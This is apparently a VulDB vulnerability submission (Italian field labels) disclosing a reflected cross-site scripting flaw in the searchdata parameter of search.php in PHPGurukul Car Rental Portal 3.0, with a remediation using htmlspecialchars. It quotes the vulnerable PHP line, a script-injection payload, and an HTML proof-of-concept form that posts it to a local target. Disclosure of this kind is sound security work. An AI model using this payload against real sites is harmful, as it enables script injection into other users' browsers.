| Titolo | PHPGurukul Car Rental Portal 3.0 Improper Neutralization of Alternate XSS Syntax |
|---|
| Descrizione | [XSS vulnerability] found in Car Rental Portal 3.0 - (search.php)
Affected Project: Car Rental Portal
Web: Php
Vendor: PHPGurukul
Official Website: (https://phpgurukul.com/car-rental-project-php-mysql-free-download/)
Version: 3.0
Updated: 05 June 2024
Vulnerable file: /search.php
Injection parameter: searchdata
Size: 16.0 MB
Sha256: 8a9ad60cf5f36e2c3c4a1ce6fed7438bb458a2d2489e2a1be60dbbdd481fdf8b
Vulnerability Description:
The issue arises because the `searchdata` parameter from the URL is being directly inserted into the value attribute of an HTML input element without proper sanitization.
This allows an attacker to inject arbitrary HTML or JavaScript code leading to an XSS attack.
Vulnerable code:
<h1>Search Result of keyword "<?php echo $_POST['searchdata'];?>"</h1>
Injection Payload Tested:
We set `searchdata` to:
"><script>alert('XSS')</script>
Execution:
When the browser parses this through a POST request, it executes the `<script>alert('XSS')</script>` code, resulting in a popup displaying `"XSS"`.
<br />
Demonstration:
Below is how `search.php` looks like:
https://i.postimg.cc/mg6Vs6Vd/1.png
As it is a POST request we need to use a file test_form.html with the following content to be able to trigger the XSS popup:
<!DOCTYPE html>
<html>
<head>
<title>Search Form</title>
</head>
<body>
<form action="http://localhost:8000/carrental/search.php" method="POST">
<input type="text" name="searchdata" value='"><script>alert("XSS")</script>'>
<input type="submit" value="Search">
</form>
</body>
</html>
Then we have to open it on the browser:
For example:
file:///home/username/Desktop/test_form.html
https://i.postimg.cc/nVYkzL09/2.png
After submitting the payload using POST with the vulnerable parameter `searchdata` and the XSS payload `"><script>alert('XSS')</script>`, XSS is triggered:
https://i.postimg.cc/t4fdfnCw/3.png
Recommendation for Preventing XSS:
To fix this vulnerability, we must always sanitize user inputs before rendering them in the HTML. We can use functions like htmlspecialchars() in PHP to encode special characters.
Example:
// Retrieve the search data using GET
$searchData = isset($_GET['searchdata']) ? $_GET['searchdata'] : '';
// Escape the output to prevent XSS
$safeSearchData = htmlspecialchars($searchData, ENT_QUOTES, 'UTF-8');
> One Click Can Change Everything: Be Secure.
|
|---|
| Fonte | ⚠️ https://github.com/secuserx/CVE/blob/main/%5BXSS%20vulnerability%5D%20found%20in%20Car%20Rental%20Portal%203.0%20-%20(search.php).md |
|---|
| Utente | secuserx (UID 76735) |
|---|
| Sottomissione | 01/11/2024 01:17 (2 anni fa) |
|---|
| Moderazione | 01/11/2024 18:07 (17 hours later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 282869 [PHPGurukul Car Rental Portal 1.0 /search.php searchdata cross site scripting] |
|---|
| Punti | 20 |
|---|